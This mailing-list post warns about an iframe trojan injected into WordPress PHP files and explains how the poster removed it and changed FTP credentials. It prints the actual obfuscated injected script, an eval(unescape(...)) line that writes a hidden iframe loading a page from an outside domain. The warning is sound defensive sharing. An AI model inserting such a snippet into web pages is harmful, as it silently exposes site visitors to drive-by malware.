Hello Friends, Today when i gone to office and i opened the site which i worked on but i got a strange problem that the kaspersky is telling the trojan programme is running
i checked 2 to 3 times by entering url in the address bar after that i understand that it as Iframe Trojan and i worked on that the problem with that is mainly it will stop index.php if u dont have antivirus the trojan will install on ur system and the trojan will take all your usernames and passwords and take important information from your system it will just add the Javascript code in index.php at last or in the head part the code will look like this <script>eval(unescape(“%77%69%6e%64%6f%77%2e%73% 74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75 %6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72% 61%6d%65%20%6e%61%6d%65%3d%62%30%20%73%72%63%3d% 5c%27%68%74%74%70%3a%2f%2f%66%72%65%64%6b%69%64% 6e%73%2e%63%6f%6d%2f%63%68%65%63%6b%2f%75%70%64%2 e%70%68%70%3f%74%3d%35%36%32%3f%27%2b%4d%61%74%68 %2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64% 6f%6d%28%29%2a%31%34%30%39%34%29%2b%27%39%33%64% 63%63%35%66%33%5c%27%20%77%69%64%74%68%d%32%36%3 1%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%6 5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65 %5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29″)); </script></code> This IFrame malware can infect any PHP file in theory because it is just a piece of code that has to be injected in the file, but provided that you are using WordPress on your blog, most likely the files infected by it are index.php in root folder wp-config.php in root folder index.php in wp-admin folder index.php in wp-contents\yourtheme\ folder default-filters.php in wp-includes folder What it does that it inserts a piece of code at the end of each of the above mentioned file right after the ending ?> PHP tag as shown below in the picture. i gone to those files and removed that code and changed the FTP credentials and its working fine. This Iframe Trojan is creating a lot of problems now a days so please Be aware of this. -- You received this message because you are subscribed to the Google Groups "nforceit" group. To post to this group, send an email to [email protected]. To unsubscribe from this group, send email to [email protected]. For more options, visit this group at http://groups.google.com/group/nforceit?hl=en-GB.
